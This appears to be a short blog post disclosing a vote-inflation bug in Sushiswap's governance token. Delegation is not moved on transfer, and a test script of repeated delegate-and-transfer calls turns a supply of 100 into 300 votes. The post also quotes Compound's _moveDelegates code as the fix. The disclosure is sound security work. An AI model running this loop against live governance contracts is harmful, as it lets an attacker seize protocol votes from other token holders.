Sushiswap delegation double spending bug.

Jong Seok Park
Sep 7, 2020 · 1 min read

Sushiswap governance allows token holders to give voting power to a delegatee. However, in the case of Sushiswap, voting power stays with the delegatee even when the token holder transfers the tokens from the wallet. In this case, the voting delegation should disappear. Instead, the voting power can be inflated with delegate & transfer transactions.

Here is a short test code.

await this.sushi.mint(alice, '100', { from: alice });await this.sushi.delegate(donas, {from: alice});
await this.sushi.transfer(bob, '100', {from: alice} );
await this.sushi.delegate(donas, {from: bob});
await this.sushi.transfer(carol, '100', {from: bob} );
await this.sushi.delegate(donas, {from: carol});
await this.sushi.transfer(alice, '100', {from: carol} );
console.log("totalSupply", (await this.sushi.totalSupply()).toString());
console.log("donas votes", (await this.sushi.getCurrentVotes(donas)).toString());

The result of this code is as follows.

totalSupply 100
donas votes 300

In other words, if a total supply is 100, then donas voting power should stay at 100. However, due to the double-spend bug, his voting power becomes 300. By repeating the process, a user can increase the voting power.

In the Compound’s Comp.sol which has a similar delegate mechanism, there is the following code that transfers delegate authority when sending a token.

function _transferTokens(address src, address dst, uint96 amount) internal {
require(src != address(0), "Comp::_transferTokens: cannot transfer from the zero address");
require(dst != address(0), "Comp::_transferTokens: cannot transfer to the zero address");
balances[src] = sub96(balances[src], amount, "Comp::_transferTokens: transfer amount exceeds balance");
balances[dst] = add96(balances[dst], amount, "Comp::_transferTokens: transfer amount overflows");
emit Transfer(src, dst, amount);_moveDelegates(delegates[src], delegates[dst], amount);}

_moveDelegates has to be added to the Sushiswap smart contract when transferring the token.

bulldax.finance

Finance You Have Never Experienced